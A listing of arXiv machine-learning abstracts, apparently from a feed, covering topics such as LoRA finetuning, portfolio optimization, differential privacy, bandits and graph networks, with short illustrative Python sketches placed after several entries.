    Finetuning large language models helps improve the results for domain-specific use cases. End-to-end finetuning of large language models is time- and resource-intensive and has high storage requirements for the finetuned version of the model. Parameter-Efficient Fine-Tuning (PEFT) methods address the time and resource challenges by keeping the large language model as a fixed base and adding additional layers, which the PEFT methods then finetune. This paper presents evaluation results for one such PEFT method, Low-Rank Adaptation (LoRA), applied to clinical dialogue summarization. The evaluation results show that LoRA performs on par with end-to-end finetuning of a large language model. The paper presents the evaluations done for solving both Subtask A and Subtask B of ImageCLEFmedical (https://www.imageclef.org/2023/medical).
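LoRA's parameter saving comes from replacing the dense weight update with a trainable low-rank factorization while the pretrained weight stays frozen. A toy NumPy sketch of that idea, not the paper's MEDIQA pipeline (a real setup would use a framework implementation, and the `alpha`-based scaling below follows the common convention):

```python
import numpy as np

class LoRALinear:
    """Frozen weight W plus a trainable low-rank update B @ A of rank r.

    Only A and B (r*(d_in + d_out) values) would be trained, instead of
    the full d_out*d_in weight matrix.
    """
    def __init__(self, W, r=4, alpha=8, seed=0):
        rng = np.random.default_rng(seed)
        d_out, d_in = W.shape
        self.W = W                         # frozen pretrained weight
        self.A = rng.normal(0, 0.01, (r, d_in))
        self.B = np.zeros((d_out, r))      # zero-init: update starts at zero
        self.scale = alpha / r

    def __call__(self, x):
        return x @ (self.W + self.scale * (self.B @ self.A)).T

W = np.eye(3)
layer = LoRALinear(W, r=2)
x = np.array([[1.0, 2.0, 3.0]])
# With B initialised to zero, the layer reproduces the frozen base exactly,
# so finetuning starts from the pretrained model's behaviour.
```

For realistic layer sizes (e.g. 4096x4096 with r=8) the trainable fraction drops to well under 1% of the dense update.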
    Portfolio Optimization: A Comparative Study. (arXiv:2307.05048v1 [q-fin.PM])
    Portfolio optimization has been an area that has attracted considerable attention from the financial research community. Designing a profitable portfolio is a challenging task involving precise forecasting of future stock returns and risks. This chapter presents a comparative study of three portfolio design approaches, the mean-variance portfolio (MVP), hierarchical risk parity (HRP)-based portfolio, and autoencoder-based portfolio. These three approaches to portfolio design are applied to the historical prices of stocks chosen from ten thematic sectors listed on the National Stock Exchange (NSE) of India. The portfolios are designed using the stock price data from January 1, 2018, to December 31, 2021, and their performances are tested on the out-of-sample data from January 1, 2022, to December 31, 2022. Extensive results are analyzed on the performance of the portfolios. It is observed that the performance of the MVP portfolio is the best on the out-of-sample data for the risk-adjusted returns. However, the autoencoder portfolios outperformed their counterparts on annual returns.
    Differentially Private Statistical Inference through $\beta$-Divergence One Posterior Sampling. (arXiv:2307.05194v1 [stat.ML])
    Differential privacy guarantees allow the results of a statistical analysis involving sensitive data to be released without compromising the privacy of any individual taking part. Achieving such guarantees generally requires the injection of noise, either directly into parameter estimates or into the estimation process. Instead of artificially introducing perturbations, sampling from Bayesian posterior distributions has been shown to be a special case of the exponential mechanism, producing consistent and efficient private estimates without altering the data generative process. The application of current approaches has, however, been limited by their strong bounding assumptions, which do not hold for basic models such as simple linear regressors. To ameliorate this, we propose $\beta$D-Bayes, a posterior sampling scheme from a generalised posterior targeting the minimisation of the $\beta$-divergence between the model and the data generating process. This provides private estimation that is generally applicable without requiring changes to the underlying model and consistently learns the data generating parameter. We show that $\beta$D-Bayes produces more precise inference for the same privacy guarantees, and further facilitates differentially private estimation via posterior sampling for complex classifiers and continuous regression models such as neural networks for the first time.
    A Mapping Study of Machine Learning Methods for Remaining Useful Life Estimation of Lead-Acid Batteries. (arXiv:2307.05163v1 [cs.LG])
    Energy storage solutions play an increasingly important role in modern infrastructure, and lead-acid batteries are among the most commonly used in the rechargeable category. Due to normal degradation over time, correctly determining the battery's State of Health (SoH) and Remaining Useful Life (RUL) contributes to enhancing predictive maintenance, reliability, and longevity of battery systems. Besides improving cost savings, correct estimation of the SoH can lead to reduced pollution through the reuse of retired batteries. This paper presents a mapping study of the state of the art in machine learning methods for estimating the SoH and RUL of lead-acid batteries. These two indicators are critical in the battery management systems of electric vehicles, renewable energy systems, and other applications that rely heavily on this battery technology. In this study, we analyzed the types of machine learning algorithms employed for estimating SoH and RUL, and evaluated their performance in terms of accuracy and inference time. Additionally, this mapping identifies and analyzes the most commonly used combinations of sensors in specific applications, such as vehicular batteries. The mapping concludes by highlighting potential gaps and opportunities for future research, which lays the foundation for further advancements in the field.
    Tracking Most Significant Shifts in Nonparametric Contextual Bandits. (arXiv:2307.05341v1 [stat.ML])
    We study nonparametric contextual bandits where Lipschitz mean reward functions may change over time. We first establish the minimax dynamic regret rate in this less understood setting in terms of the number of changes $L$ and the total variation $V$, both capturing all changes in distribution over the context space, and argue that state-of-the-art procedures are suboptimal in this setting. Next, we turn to the question of adaptivity in this setting, i.e. achieving the minimax rate without knowledge of $L$ or $V$. Quite importantly, we posit that the bandit problem, viewed locally at a given context $X_t$, should not be affected by reward changes in other parts of the context space $\cal X$. We therefore propose a notion of change, which we term experienced significant shifts, that better accounts for locality, and thus counts considerably fewer changes than $L$ and $V$. Furthermore, similar to recent work on non-stationary MAB (Suk & Kpotufe, 2022), experienced significant shifts only count the most significant changes in mean rewards, e.g., severe best-arm changes relevant to observed contexts. Our main result is to show that this more tolerant notion of change can in fact be adapted to.
    Distributed Pruning Towards Tiny Neural Networks in Federated Learning. (arXiv:2212.01977v2 [cs.LG] UPDATED)
    Neural network pruning is an essential technique for reducing the size and complexity of deep neural networks, enabling large-scale models on devices with limited resources. However, existing pruning approaches heavily rely on training data for guiding the pruning strategies, making them ineffective for federated learning over distributed and confidential datasets. Additionally, the memory- and computation-intensive pruning process becomes infeasible for resource-constrained devices in federated learning. To address these challenges, we propose FedTiny, a distributed pruning framework for federated learning that generates specialized tiny models for memory- and computing-constrained devices. We introduce two key modules in FedTiny to adaptively search coarse- and finer-pruned specialized models to fit deployment scenarios with sparse and cheap local computation. First, an adaptive batch normalization selection module is designed to mitigate biases in pruning caused by the heterogeneity of local data. Second, a lightweight progressive pruning module aims to finely prune the models under strict memory and computational budgets, allowing the pruning policy for each layer to be gradually determined rather than evaluating the overall model structure. The experimental results demonstrate the effectiveness of FedTiny, which outperforms state-of-the-art approaches, particularly when compressing deep models to extremely sparse tiny models. FedTiny achieves an accuracy improvement of 2.61% while significantly reducing the computational cost by 95.91% and the memory footprint by 94.01% compared to state-of-the-art methods.
    Improving Image-Based Precision Medicine with Uncertainty-Aware Causal Models. (arXiv:2305.03829v2 [cs.LG] UPDATED)
    Image-based precision medicine aims to personalize treatment decisions based on an individual's unique imaging features so as to improve their clinical outcome. Machine learning frameworks that integrate uncertainty estimation as part of their treatment recommendations would be safer and more reliable. However, little work has been done in adapting uncertainty estimation techniques and validation metrics for precision medicine. In this paper, we use Bayesian deep learning for estimating the posterior distribution over factual and counterfactual outcomes on several treatments. This allows for estimating the uncertainty for each treatment option and for the individual treatment effects (ITE) between any two treatments. We train and evaluate this model to predict future new and enlarging T2 lesion counts on a large, multi-center dataset of MR brain images of patients with multiple sclerosis, exposed to several treatments during randomized controlled trials. We evaluate the correlation of the uncertainty estimate with the factual error, and, given the lack of ground truth counterfactual outcomes, demonstrate how uncertainty for the ITE prediction relates to bounds on the ITE error. Lastly, we demonstrate how knowledge of uncertainty could modify clinical decision-making to improve individual patient and clinical trial outcomes.
    Deep Probabilistic Movement Primitives with a Bayesian Aggregator. (arXiv:2307.05141v1 [cs.RO])
    Movement primitives are trainable parametric models that reproduce robotic movements starting from a limited set of demonstrations. Previous works proposed simple linear models that exhibited high sample efficiency and generalization power by allowing temporal modulation of movements (reproducing movements faster or slower), blending (merging two movements into one), via-point conditioning (constraining a movement to meet some particular via-points) and context conditioning (generation of movements based on an observed variable, e.g., position of an object). Previous works have also proposed neural network-based motor primitive models and demonstrated their capacity to perform tasks with some forms of input conditioning or time-modulation representations. However, no single unified deep motor primitive model has been proposed that is capable of all the previous operations, limiting the potential applications of neural motor primitives. This paper proposes a deep movement primitive architecture that encodes all the operations above and uses a Bayesian context aggregator that allows more sound context conditioning and blending. Our results demonstrate that our approach can scale to reproduce complex motions on a larger variety of input choices than baselines while maintaining the operations that linear movement primitives provide.
    Probabilistic Counterexample Guidance for Safer Reinforcement Learning. (arXiv:2307.04927v1 [cs.LG])
    Safe exploration aims at addressing the limitations of Reinforcement Learning (RL) in safety-critical scenarios, where failures during trial-and-error learning may incur high costs. Several methods exist to incorporate external knowledge or to use proximal sensor data to limit the exploration of unsafe states. However, reducing exploration risks in unknown environments, where an agent must discover safety threats during exploration, remains challenging. In this paper, we target the problem of safe exploration by guiding the training with counterexamples of the safety requirement. Our method abstracts both continuous and discrete state-space systems into compact abstract models representing the safety-relevant knowledge acquired by the agent during exploration. We then exploit probabilistic counterexample generation to construct minimal simulation submodels eliciting safety requirement violations, where the agent can efficiently train offline to refine its policy towards minimising the risk of safety violations during the subsequent online exploration. We demonstrate our method's effectiveness in reducing safety violations during online exploration in preliminary experiments by an average of 40.3% compared with QL and DQN standard algorithms and 29.1% compared with previous related work, while achieving comparable cumulative rewards with respect to unrestricted exploration and alternative approaches.
    One-Versus-Others Attention: Scalable Multimodal Integration. (arXiv:2307.05435v1 [cs.LG])
    Multimodal learning models have become increasingly important as they surpass single-modality approaches on diverse tasks ranging from question-answering to autonomous driving. Despite the importance of multimodal learning, existing efforts focus on NLP applications, where the number of modalities is typically less than four (audio, video, text, images). However, data inputs in other domains, such as the medical field, may include X-rays, PET scans, MRIs, genetic screening, clinical notes, and more, creating a need for both efficient and accurate information fusion. Many state-of-the-art models rely on pairwise cross-modal attention, which does not scale well for applications with more than three modalities. For $n$ modalities, computing attention will result in $n \choose 2$ operations, potentially requiring considerable amounts of computational resources. To address this, we propose a new domain-neutral attention mechanism, One-Versus-Others (OvO) attention, that scales linearly with the number of modalities and requires only $n$ attention operations, thus offering a significant reduction in computational complexity compared to existing cross-modal attention algorithms. Using three diverse real-world datasets as well as an additional simulation experiment, we show that our method improves performance compared to popular fusion techniques while decreasing computation costs.
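The linear scaling claim can be made concrete with a sketch: instead of attending over every pair of modalities, each modality attends once to an aggregate (here, the mean) of all the others, giving $n$ attention calls rather than $n \choose 2$. This is an illustrative reading of the OvO idea, not the paper's exact architecture; the shared weight matrices and shapes below are assumptions:

```python
import numpy as np

def softmax(z, axis=-1):
    z = z - z.max(axis=axis, keepdims=True)
    e = np.exp(z)
    return e / e.sum(axis=axis, keepdims=True)

def ovo_attention(modalities, Wq, Wk, Wv):
    """One-versus-others attention sketch.

    Each modality (tokens x dim) queries the average of the other
    modalities, so n modalities need only n attention operations."""
    n = len(modalities)
    outputs = []
    for i, m in enumerate(modalities):
        others = sum(modalities[j] for j in range(n) if j != i) / (n - 1)
        Q, K, V = m @ Wq, others @ Wk, others @ Wv
        attn = softmax(Q @ K.T / np.sqrt(Q.shape[-1]))
        outputs.append(attn @ V)
    return outputs

rng = np.random.default_rng(0)
d = 8
mods = [rng.normal(size=(5, d)) for _ in range(4)]  # 4 modalities, 5 tokens
Wq, Wk, Wv = (rng.normal(size=(d, d)) for _ in range(3))
outs = ovo_attention(mods, Wq, Wk, Wv)
```

With 4 modalities this loop runs 4 attention operations, versus the 6 pairwise operations that cross-modal attention would need; the gap widens quickly for medical settings with many input types.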
    Restoring the saturation response of a PMT using pulse-shape and artificial-neural-networks. (arXiv:2302.06170v3 [physics.ins-det] UPDATED)
    The linear response of a photomultiplier tube (PMT) is a required property for photon counting and reconstruction of the neutrino energy. The valid region of linearity and the saturation response of the PMT were investigated using a linear-alkyl-benzene (LAB)-based liquid scintillator. A correlation was observed between the two different saturation responses, with pulse-shape distortion and pulse-area decrease. The observed pulse-shape provides useful information for the estimation of the linearity region relative to the pulse-area. This correlation-based diagnosis allows an in-situ estimation of the linearity range, which was previously challenging. The measured correlation between the two saturation responses was employed to train an artificial neural network (ANN) to predict the decrease in pulse-area from the observed pulse-shape. The ANN-predicted pulse-area decrease enables the prediction of the ideal number of photoelectrons irrespective of the saturation behavior. This pulse-shape-based machine learning technique offers a novel method for restoring the saturation response of PMTs.
    Hierarchical Classification of Research Fields in the "Web of Science" Using Deep Learning. (arXiv:2302.00390v2 [cs.DL] UPDATED)
    This paper presents a hierarchical classification system that automatically categorizes a scholarly publication using its abstract into a three-tier hierarchical label set (discipline, field, subfield) in a multi-class setting. This system enables a holistic categorization of research activities in the mentioned hierarchy in terms of knowledge production through articles and impact through citations, permitting those activities to fall into multiple categories. The classification system distinguishes 44 disciplines, 718 fields and 1,485 subfields among 160 million abstract snippets in Microsoft Academic Graph (version 2018-05-17). We used batch training in a modularized and distributed fashion to address and allow for interdisciplinary and interfield classifications in single-label and multi-label settings. In total, we have conducted 3,140 experiments in all considered models (Convolutional Neural Networks, Recurrent Neural Networks, Transformers). The classification accuracy is > 90% in 77.13% and 78.19% of the single-label and multi-label classifications, respectively. We examine the advantages of our classification by its ability to better align research texts and output with disciplines, to adequately classify them in an automated way, and to capture the degree of interdisciplinarity. The proposed system (a set of pre-trained models) can serve as a backbone to an interactive system for indexing scientific publications in the future.
    Simplicial Message Passing for Chemical Property Prediction. (arXiv:2307.05392v1 [cond-mat.mtrl-sci])
    Recently, message-passing neural networks (MPNNs) have provided a promising tool for dealing with molecular graphs and have achieved remarkable success in facilitating the discovery and design of materials with desired properties. However, classical MPNN methods also suffer from a limitation in capturing the strong topological information hidden in molecular structures, such as nonisomorphic graphs. To address this problem, this work proposes a Simplicial Message Passing (SMP) framework to better capture the topological information from molecules, which can break through the limitation of the vanilla message-passing paradigm. In SMP, a generalized message-passing framework is established for aggregating information from simplicial complexes of arbitrary order, and a hierarchical structure is elaborated to allow information exchange between simplices of different orders. We apply the SMP framework within deep learning architectures for quantum-chemical property prediction and achieve state-of-the-art results. The results show that, compared to traditional MPNNs, involving higher-order simplices can better capture the complex structure of molecules and substantially enhance task performance. The SMP-based model can provide a generalized framework for GNNs and aid in the discovery and design of materials with tailored properties for various applications.
    SleepEGAN: A GAN-enhanced Ensemble Deep Learning Model for Imbalanced Classification of Sleep Stages. (arXiv:2307.05362v1 [eess.SP])
    Deep neural networks have played an important role in automatic sleep stage classification because of their strong representation and in-model feature transformation abilities. However, class imbalance and individual heterogeneity which typically exist in raw EEG signals of sleep data can significantly affect the classification performance of any machine learning algorithms. To solve these two problems, this paper develops a generative adversarial network (GAN)-powered ensemble deep learning model, named SleepEGAN, for the imbalanced classification of sleep stages. To alleviate class imbalance, we propose a new GAN (called EGAN) architecture adapted to the features of EEG signals for data augmentation. The generated samples for the minority classes are used in the training process. In addition, we design a cost-free ensemble learning strategy to reduce the model estimation variance caused by the heterogeneity between the validation and test sets, so as to enhance the accuracy and robustness of prediction performance. We show that the proposed method can improve classification accuracy compared to several existing state-of-the-art methods using three public sleep datasets.
    Stochastic Nested Compositional Bi-level Optimization for Robust Feature Learning. (arXiv:2307.05384v1 [math.OC])
    We develop and analyze stochastic approximation algorithms for solving nested compositional bi-level optimization problems. These problems involve a nested composition of $T$ potentially non-convex smooth functions in the upper-level, and a smooth and strongly convex function in the lower-level. Our proposed algorithm does not rely on matrix inversions or mini-batches and can achieve an $\epsilon$-stationary solution with an oracle complexity of approximately $\tilde{O}_T(1/\epsilon^{2})$, assuming the availability of stochastic first-order oracles for the individual functions in the composition and the lower-level, which are unbiased and have bounded moments. Here, $\tilde{O}_T$ hides polylog factors and constants that depend on $T$. The key challenge we address in establishing this result relates to handling three distinct sources of bias in the stochastic gradients. The first source arises from the compositional nature of the upper-level, the second stems from the bi-level structure, and the third emerges due to the utilization of Neumann series approximations to avoid matrix inversion. To demonstrate the effectiveness of our approach, we apply it to the problem of robust feature learning for deep neural networks under covariate shift, showcasing the benefits and advantages of our methodology in that context.
    Choosing Well Your Opponents: How to Guide the Synthesis of Programmatic Strategies. (arXiv:2307.04893v1 [cs.LG])
    This paper introduces Local Learner (2L), an algorithm for providing a set of reference strategies to guide the search for programmatic strategies in two-player zero-sum games. Previous learning algorithms, such as Iterated Best Response (IBR), Fictitious Play (FP), and Double-Oracle (DO), can be computationally expensive or miss important information for guiding search algorithms. 2L actively selects a set of reference strategies to improve the search signal. We empirically demonstrate the advantages of our approach while guiding a local search algorithm for synthesizing strategies in three games, including MicroRTS, a challenging real-time strategy game. Results show that 2L learns reference strategies that provide a stronger search signal than IBR, FP, and DO. We also simulate a tournament of MicroRTS, where a synthesizer using 2L outperformed the winners of the two latest MicroRTS competitions, which were programmatic strategies written by human programmers.  ( 2 min )
    Optimized Crystallographic Graph Generation for Material Science. (arXiv:2307.05380v1 [cond-mat.mtrl-sci])
Graph neural networks are widely used in machine learning applied to chemistry, and in particular for material science discovery. For crystalline materials, however, generating a graph-based representation from geometrical information for neural networks is not a trivial task. The periodicity of crystalline structures requires efficient implementations so that they can be processed in real time in a massively parallel environment. With the aim of training graph-based generative models for new material discovery, we propose an efficient tool to generate cutoff graphs and k-nearest-neighbour graphs of periodic structures with GPU optimization. We provide pyMatGraph, a PyTorch-compatible framework to generate graphs in real time during the training of a neural network architecture. Our tool can update the graph of a structure, enabling generative models to update the geometry and process the updated graph during forward propagation on the GPU side. Our code is publicly available at https://github.com/aklipf/mat-graph.  ( 2 min )
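The core difficulty — periodic images — can be seen in a minimal pure-Python cutoff-graph builder for a cubic cell (a simplified sketch, not the GPU implementation in pyMatGraph): as long as the cutoff is smaller than the cell length, enumerating the 27 surrounding lattice images suffices.

```python
from itertools import product

def cutoff_graph(frac_coords, cell_length, cutoff):
    """Edges between atoms (including periodic images) within `cutoff`.

    frac_coords: list of (x, y, z) fractional coordinates in a cubic cell.
    Returns (i, j, image) triples, where `image` is the lattice translation
    applied to atom j.
    """
    edges = []
    for i, a in enumerate(frac_coords):
        for j, b in enumerate(frac_coords):
            for image in product((-1, 0, 1), repeat=3):
                if i == j and image == (0, 0, 0):
                    continue  # skip the self-loop with no translation
                d2 = sum((cell_length * (b[k] + image[k] - a[k])) ** 2
                         for k in range(3))
                if d2 <= cutoff ** 2:
                    edges.append((i, j, image))
    return edges

# One atom in a unit cubic cell: exactly the 6 face-adjacent images
# fall inside a cutoff of 1.01 (the diagonal images are at sqrt(2)).
edges = cutoff_graph([(0.0, 0.0, 0.0)], cell_length=1.0, cutoff=1.01)
```

A GPU version vectorizes the pairwise distance computation over all image offsets, which is what makes real-time graph updates during training feasible.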
    Discovering Symbolic Laws Directly from Trajectories with Hamiltonian Graph Neural Networks. (arXiv:2307.05299v1 [cs.LG])
The time evolution of physical systems is described by differential equations, which depend on abstract quantities like energy and force. Traditionally, these quantities are derived as functionals based on observables such as positions and velocities. Discovering these governing symbolic laws is the key to comprehending the interactions in nature. Here, we present a Hamiltonian graph neural network (HGNN), a physics-enforced GNN that learns the dynamics of systems directly from their trajectories. We demonstrate the performance of HGNN on n-springs, n-pendulums, gravitational systems, and binary Lennard-Jones systems; HGNN learns the dynamics in excellent agreement with the ground truth from small amounts of data. We also evaluate the ability of HGNN to generalize to larger system sizes and to a hybrid spring-pendulum system that combines two of the original systems (spring and pendulum) on which the models are trained independently. Finally, employing symbolic regression on the learned HGNN, we infer the underlying equations relating the energy functionals, even for complex systems such as the binary Lennard-Jones liquid. Our framework facilitates the interpretable discovery of interaction laws directly from physical system trajectories. Furthermore, this approach can be extended to other systems with topology-dependent dynamics, such as cells, polydisperse gels, or deformable bodies.  ( 2 min )
    Automated Detection of Gait Events and Travel Distance Using Waist-worn Accelerometers Across a Typical Range of Walking and Running Speeds. (arXiv:2307.04866v1 [eess.SP])
Background: Estimation of temporospatial clinical features of gait (CFs), such as step count and length, step duration, step frequency, gait speed and distance traveled is an important component of community-based mobility evaluation using wearable accelerometers. However, challenges arising from device complexity and availability, cost and analytical methodology have limited widespread application of such tools. Research Question: Can accelerometer data from commercially-available smartphones be used to extract gait CFs across a broad range of attainable gait velocities in children with Duchenne muscular dystrophy (DMD) and typically developing controls (TDs) using machine learning (ML)-based methods? Methods: Fifteen children with DMD and 15 TDs underwent supervised clinical testing across a range of gait speeds using 10 or 25m run/walk (10MRW, 25MRW), 100m run/walk (100MRW), 6-minute walk (6MWT) and free-walk (FW) evaluations while wearing a mobile phone-based accelerometer at the waist near the body's center of mass. Gait CFs were extracted from the accelerometer data using a multi-step machine learning-based process and results were compared to ground-truth observation data. Results: Model predictions vs. observed values for step counts, distance traveled, and step length showed a strong correlation (Pearson's r = -0.9929 to 0.9986, p<0.0001). The estimates demonstrated a mean (SD) percentage error of 1.49% (7.04%) for step counts, 1.18% (9.91%) for distance traveled, and 0.37% (7.52%) for step length compared to ground truth observations for the combined 6MWT, 100MRW, and FW tasks. Significance: The study findings indicate that a single accelerometer placed near the body's center of mass can accurately measure CFs across different gait speeds in both TD and DMD peers, suggesting that there is potential for accurately measuring CFs in the community with consumer-level smartphones.  ( 3 min )
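One ingredient of such pipelines — counting steps from a waist-worn acceleration trace — can be sketched with a deliberately minimal threshold-crossing heuristic (a hypothetical toy, not the paper's multi-step ML process, which additionally filters the signal and learns its parameters).

```python
import math

def count_steps(accel, threshold=0.5):
    """Count steps as upward crossings of `threshold` in an acceleration
    trace with gravity removed. Each stride produces one peak, so one
    upward crossing per stride approximates the step count."""
    steps = 0
    above = False
    for a in accel:
        if not above and a > threshold:
            steps += 1     # rising edge: a new peak begins
            above = True
        elif above and a < threshold:
            above = False  # falling edge: wait for the next peak
    return steps

# Synthetic trace: a 2 Hz stride rhythm sampled at 50 Hz for 5 seconds,
# i.e. 10 strides, each contributing one threshold crossing.
fs, stride_hz, duration = 50, 2.0, 5.0
trace = [math.sin(2 * math.pi * stride_hz * t / fs)
         for t in range(int(fs * duration))]
n_steps = count_steps(trace)
```

Real accelerometer data is far noisier, which is why the paper's ML-based extraction outperforms fixed heuristics like this one.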
    Articulated 3D Head Avatar Generation using Text-to-Image Diffusion Models. (arXiv:2307.04859v1 [cs.CV])
    The ability to generate diverse 3D articulated head avatars is vital to a plethora of applications, including augmented reality, cinematography, and education. Recent work on text-guided 3D object generation has shown great promise in addressing these needs. These methods directly leverage pre-trained 2D text-to-image diffusion models to generate 3D-multi-view-consistent radiance fields of generic objects. However, due to the lack of geometry and texture priors, these methods have limited control over the generated 3D objects, making it difficult to operate inside a specific domain, e.g., human heads. In this work, we develop a new approach to text-guided 3D head avatar generation to address this limitation. Our framework directly operates on the geometry and texture of an articulable 3D morphable model (3DMM) of a head, and introduces novel optimization procedures to update the geometry and texture while keeping the 2D and 3D facial features aligned. The result is a 3D head avatar that is consistent with the text description and can be readily articulated using the deformation model of the 3DMM. We show that our diffusion-based articulated head avatars outperform state-of-the-art approaches for this task. The latter are typically based on CLIP, which is known to provide limited diversity of generation and accuracy for 3D object generation.  ( 2 min )
    Realising Synthetic Active Inference Agents, Part II: Variational Message Updates. (arXiv:2306.02733v2 [stat.ML] UPDATED)
    The Free Energy Principle (FEP) describes (biological) agents as minimising a variational Free Energy (FE) with respect to a generative model of their environment. Active Inference (AIF) is a corollary of the FEP that describes how agents explore and exploit their environment by minimising an expected FE objective. In two related papers, we describe a scalable, epistemic approach to synthetic AIF agents, by message passing on free-form Forney-style Factor Graphs (FFGs). A companion paper (part I) introduces a Constrained FFG (CFFG) notation that visually represents (generalised) FE objectives for AIF. The current paper (part II) derives message passing algorithms that minimise (generalised) FE objectives on a CFFG by variational calculus. A comparison between simulated Bethe and generalised FE agents illustrates how synthetic AIF induces epistemic behaviour on a T-maze navigation task. With a full message passing account of synthetic AIF agents, it becomes possible to derive and reuse message updates across models and move closer to industrial applications of synthetic AIF.  ( 2 min )
    DyCL: Dynamic Neural Network Compilation Via Program Rewriting and Graph Optimization. (arXiv:2307.04963v1 [cs.CL])
A DL compiler's primary function is to translate DNN programs written in high-level DL frameworks such as PyTorch and TensorFlow into portable executables. These executables can then be flexibly executed by the deployed host programs. However, existing DL compilers rely on a tracing mechanism, which involves feeding a runtime input to a neural network program and tracing the program execution paths to generate the computational graph necessary for compilation. Unfortunately, this mechanism falls short when dealing with modern dynamic neural networks (DyNNs) that possess varying computational graphs depending on the inputs. Consequently, conventional DL compilers struggle to accurately compile DyNNs into executable code. To address this limitation, we propose DyCL, a general approach that enables any existing DL compiler to successfully compile DyNNs. DyCL tackles the dynamic nature of DyNNs by introducing a compilation mechanism that redistributes the control and data flow of the original DNN programs during the compilation process. Specifically, DyCL develops program analysis and program transformation techniques to convert a dynamic neural network into multiple sub-neural networks. Each sub-neural network is devoid of conditional statements and is compiled independently. Furthermore, DyCL synthesizes a host module that models the control flow of the DyNNs and facilitates the invocation of the sub-neural networks. Our evaluation demonstrates the effectiveness of DyCL, achieving a 100% success rate in compiling all dynamic neural networks. Moreover, the compiled executables generated by DyCL exhibit significantly improved performance, running between $1.12\times$ and $20.21\times$ faster than the original DyNNs executed on general-purpose DL frameworks.  ( 3 min )
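The rewriting idea can be sketched in a few lines (a deliberately tiny illustration, not DyCL's actual program transformations): a network with input-dependent control flow is split into branch-free sub-networks, and a host module reproduces the original dispatch.

```python
# A "dynamic" toy network: its computational graph depends on the input,
# so a tracing compiler would capture only one of the two branches.
def dynamic_model(x):
    if sum(x) > 0:
        return [2.0 * v for v in x]   # branch A
    return [v + 1.0 for v in x]       # branch B

# DyCL-style decomposition: each branch becomes a branch-free
# sub-network that tracing can compile, plus a host module that
# models the control flow and invokes the right sub-network.
def sub_network_a(x):
    return [2.0 * v for v in x]

def sub_network_b(x):
    return [v + 1.0 for v in x]

def host_module(x):
    # In the real system the sub-networks are independently compiled
    # executables; plain Python functions stand in for them here.
    return sub_network_a(x) if sum(x) > 0 else sub_network_b(x)
```

Because each sub-network has a single static graph, any tracing-based compiler can handle it, and correctness reduces to the host module reproducing the original predicate.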
    Perturbed-History Exploration in Stochastic Linear Bandits. (arXiv:1903.09132v2 [cs.LG] UPDATED)
    We propose a new online algorithm for cumulative regret minimization in a stochastic linear bandit. The algorithm pulls the arm with the highest estimated reward in a linear model trained on its perturbed history. Therefore, we call it perturbed-history exploration in a linear bandit (LinPHE). The perturbed history is a mixture of observed rewards and randomly generated i.i.d. pseudo-rewards. We derive a $\tilde{O}(d \sqrt{n})$ gap-free bound on the $n$-round regret of LinPHE, where $d$ is the number of features. The key steps in our analysis are new concentration and anti-concentration bounds on the weighted sum of Bernoulli random variables. To show the generality of our design, we generalize LinPHE to a logistic model. We evaluate our algorithms empirically and show that they are practical.  ( 2 min )
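The perturbed-history idea is easiest to see in the original multi-armed (non-linear) setting that LinPHE generalizes. Below is a hedged sketch for a Bernoulli bandit: each arm's estimate is computed from its observed rewards mixed with `a` i.i.d. Bernoulli(1/2) pseudo-rewards per observation, and the greedy arm under the perturbed estimate is pulled (parameter choices here are illustrative, not the paper's).

```python
import random

def phe_bandit(arm_means, horizon, a=1.0, seed=0):
    """Perturbed-history exploration for a K-armed Bernoulli bandit.

    The randomness of the pseudo-rewards plays the role of exploration:
    arms with short histories get noisier perturbed estimates and are
    therefore tried more often."""
    rng = random.Random(seed)
    history = [[] for _ in arm_means]
    pulls = [0] * len(arm_means)
    for t in range(horizon):
        if t < len(arm_means):
            arm = t  # pull each arm once to initialise its history
        else:
            scores = []
            for rewards in history:
                n_pseudo = int(a * len(rewards))
                pseudo = [float(rng.random() < 0.5) for _ in range(n_pseudo)]
                perturbed = rewards + pseudo
                scores.append(sum(perturbed) / len(perturbed))
            arm = max(range(len(scores)), key=scores.__getitem__)
        reward = float(rng.random() < arm_means[arm])
        history[arm].append(reward)
        pulls[arm] += 1
    return pulls

pulls = phe_bandit([0.2, 0.8], horizon=500)  # arm 1 should dominate
```

LinPHE replaces the per-arm averages with a least-squares fit on the perturbed history, which is what yields the $\tilde{O}(d\sqrt{n})$ bound.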
    Test-Time Training on Video Streams. (arXiv:2307.05014v1 [cs.CV])
    Prior work has established test-time training (TTT) as a general framework to further improve a trained model at test time. Before making a prediction on each test instance, the model is trained on the same instance using a self-supervised task, such as image reconstruction with masked autoencoders. We extend TTT to the streaming setting, where multiple test instances - video frames in our case - arrive in temporal order. Our extension is online TTT: The current model is initialized from the previous model, then trained on the current frame and a small window of frames immediately before. Online TTT significantly outperforms the fixed-model baseline for four tasks, on three real-world datasets. The relative improvement is 45% and 66% for instance and panoptic segmentation. Surprisingly, online TTT also outperforms its offline variant that accesses more information, training on all frames from the entire test video regardless of temporal order. This differs from previous findings using synthetic videos. We conceptualize locality as the advantage of online over offline TTT. We analyze the role of locality with ablations and a theory based on bias-variance trade-off.  ( 2 min )
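The online TTT protocol reduces to a simple loop: initialize from the previous model, adapt on a small window of recent frames, predict. The sketch below is a hedged toy where the "model" is a single parameter fit to the local mean of a drifting scalar stream, standing in for a self-supervised reconstruction loss; none of the hyperparameters come from the paper.

```python
def online_ttt(frames, window=5, lr=0.5, steps=3):
    """Online test-time training on a stream of scalar 'frames'.

    The model for frame t is initialised from the model for frame t-1,
    then takes a few gradient steps on the current frame plus a small
    window of immediately preceding frames."""
    theta = frames[0]
    preds = []
    for t, frame in enumerate(frames):
        preds.append(theta)  # predict with the current model first
        recent = frames[max(0, t - window + 1): t + 1]
        for _ in range(steps):  # adapt on the local window
            grad = sum(theta - x for x in recent) / len(recent)
            theta -= lr * grad
    return preds

# A slowly drifting stream: online adaptation tracks the drift, so the
# prediction error stays bounded by a small constant lag.
stream = [0.01 * t for t in range(200)]
preds = online_ttt(stream)
errors = [abs(p - x) for p, x in zip(preds, stream)]
```

The locality argument in the paper corresponds to `window` being small: the model stays biased toward the recent past, which is precisely what helps on temporally coherent video.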
    Accelerated Discovery of Machine-Learned Symmetries: Deriving the Exceptional Lie Groups G2, F4 and E6. (arXiv:2307.04891v1 [hep-th])
